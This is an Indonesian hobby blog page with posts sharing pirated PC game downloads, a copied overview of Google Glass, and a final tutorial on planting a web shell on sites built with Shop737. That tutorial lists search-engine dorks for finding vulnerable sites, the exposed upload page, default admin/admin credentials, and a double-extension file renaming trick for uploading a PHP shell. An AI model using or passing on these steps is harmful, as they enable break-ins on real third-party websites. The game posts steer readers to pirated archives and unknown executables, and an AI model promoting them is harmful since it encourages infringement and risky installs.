CyberCrew-Newbie

Software,Hacking,Security,Tutorial,AntiVirus DLL.

Download Game Tiny Troopers Zombie Final PC

Selamat pagi sob..
Kali ini saya akan berbagi sebuah game yang menurut saya game lucu dan menarik :v
Nama nya adalah Tiny Troopers Zombie , sebuah game indie bergenre actionsekaligus strategiy dimana pemainnya harus memusnahkan zombie dengan cara menembaknya menggunakan senjata.

Ini penampakannya:










Via 4shared
Donwload DISINI

Via Mediafrie
Download DISINI

Pass: cybercrew-newbie.blogspot.com
Comments
0 Comments

Download Plant VS Zombie 2 Full ( For PC )

Selamat pagi sob :D
Lama banget gk pernah posting wkwkwk punya kesibukan sendiri..
Kali ini saya kan berbagi sebuah game yang mungkin menarik untuk dimainkan..
Nama nya Plant VS Zombie 2 Full . pasti tau kan game itu? tapi ini yang versi kedua nya sob~ :D
Pasti nya lebih seru...
Tanpa basa-basi ya sob, langsung sedot.... :D

Ini penampakannya:

Download Plant VS Zombie Full ( For PC )

Download Plant VS Zombie Full ( For PC )

Download nya Disini sob


Tutorial Instal Gamenya :
1. Buka File .exe yang telah di download tadi, lalu ekstrak file tersebut...
Download Plant VS Zombie Full ( For PC )

2. Setelah selesai , buka folder tempat file tadi...  lalu klick 2x iPadian.exe
Download Plant VS Zombie Full ( For PC )

3. Nah Setelah klick 2x akan ada app yg berjalan, nah di sini ada Pvzj2 yang siap di mainkan oleh anda ^_^

Download Plant VS Zombie Full ( For PC )

Selamat Mencoba :)
Comments
0 Comments

Google Glass Si Kaca Mata Canggih

Selamat malam teman :)
malem minggu nih :v aku dirumah sendiri..aku kan jomblo :v
udah wkwkwk... yang kita bahas bukan itu :v
malam ini kita akan membahas tentang Google Glass

ini nih penampakannya

Google Glass adalah komputer bisa pakai yang sedang dikembangkan oleh Google melalui proyek riset dan pengembangan Project Glass. Perangkat ini menampilkan informasi dalam format bergaya telepon pintar, yang bisa terhubung ke Internet melalui perintah suara bahasa alami.
Saat ini, kacamata yang diproduksi tidak memiliki lensa terpasang, namun Google sedang mempertimbangkan kemitraan dengan produsen kacamata seperti Ray-Ban atau Warby Parker, serta dengan para pengecer, agar konsumen bisa mencoba perangkat sebelum membelinya. Explorer Edition tidak bisa digunakan oleh orang-orang yang memakai kacamata resep, namun Google telah mengonfirmasi bahwa mereka akan berupaya agar Glass bisa beroperasi dengan lensa yang sesuai dengan resep pemakainya.
Google Glass sedang dikembangkan oleh Google X. yang sebelumnya juga telah mengembangkan teknologi futuristis lainnya seperti mobil swatantra. Proyek ini diumumkan melalui Google+ oleh kepala Project Glass,Babak Parviz, seorang teknisi lensa kontak; Steve Lee, seorang manajer produk dan "spesialis geolokasi"; dan Sebastian Thrun, pengembang Udacity yang juga ikut mengembangkan proyek mobil swatantra. Google telah mematenkan desain Project Glass. Thad Starner, seorang pakar teknologi realitas tertambah, adalah pemimpin teknis proyek ini.

Spesifikasi teknis

Untuk edisi pengembang Explorer, spesifikasinya adalah sebagai berikut:
  • Android 4.0.4 ke atas
  • Layar 640×360
  • Kamera 5-megapiksel, kemampuan merekam video 720p
  • Wi-Fi 802.11b/g
  • Bluetooth
  • Penyimpanan 16GB (12 GB tersedia)
  • Texas Instruments OMAP 4430 SoC 1.2Ghz Dual(ARMv7)
  • 682MB RAM
  • Giroskop 3 axis
  • Akselerometer 3 axis
  • Magnetometer (kompas) 3 axis
  • Sensor cahaya ambient dan sensor proksimitas 
  • Transduser konduksi tulang

Referensi

  1. Miller, Claire Cain (20 February 2013). "Google Searches for Style". The New York Times. Diakses 5 March 2013.
  2. Faqs - Glass Press".
  3. Coldewey, Devin (23 February 2013). "Google Glass to launch this year for under $1,500". NBC News.com Gadgetbox. Diakses 23 February 2013.
  4. Etherington, Darrell (18 April 2013). "Larry Page Says Google Glass Runs On Android". TechCrunch. Diakses 18 April 2013.
  5. These Are Google Glass's CPU and RAM Specs | Gizmodo UK April 26, 2013 - 7:30pm
  6. Torberg, Scott (11 June 2013). "Google Glass Teardown". TechRadar. Diakses 12 June 2013. "'With a native resolution of 640x360, the pixels are roughly 1/8th the physical width of those on the iPhone 5's retina display.'"
  7. "Tech specs". Google. 16 April 2013. Diakses 18 April 2013.
  8. Goldman, David (4 April 2012). "Google unveils 'Project Glass' virtual-reality glasses". Money (CNN). Diakses 4 April 2012.
  9. Albanesius, Chloe (4 April 2012). "Google 'Project Glass' Replaces the Smartphone With Glasses". PC
Tjieee.. . . pengen ya? beli aja wkwkwk :v

Comments
0 Comments

Cara Tanam Shell Dengan Teknik Shop737

Selamat siang sob :)
kali ini saya kasih tau Cara Tanam Shell Dengan Teknik Shop737
shop737 itu bug lama tapi baru ngtrend sekarang wkwkwk :v
yaudah langsung saja ke TKP. . .

sebelumnya siapkan shell nya,
shellnya harus di rename terlebih dahulu
kasih .xxxjpg dibelakang shell
menjadi shell.php.xxxjpg

dork via googleintext:"Powered by Shop737"
dork via bingIP: 103.29.215.201 "/poto/"
note: 103.29.215.201 -> ip bisa di ganti

exploit: /poto/upload.php
contoh: wwwtarget.com/poto/upload.php

saya asumsikan sudah dapat web yang vuln..

 www.target.com/poto/


sekarang kita kasih exlpoitnya
jadi wwwtarget.com/poto/upload.php


suruh masukin username sama password

username: admin
password: admin


liat gambar di atas^
upload shell anda tadi yang sebelumnya sudah di rename.
hasilnya www.target.com/poto/[kategori]/shell.php.xxxjpg



Semoga bermanfaat :)
Comments
0 Comments
Diberdayakan oleh Blogger.
 

Visitor



free counters

My Banner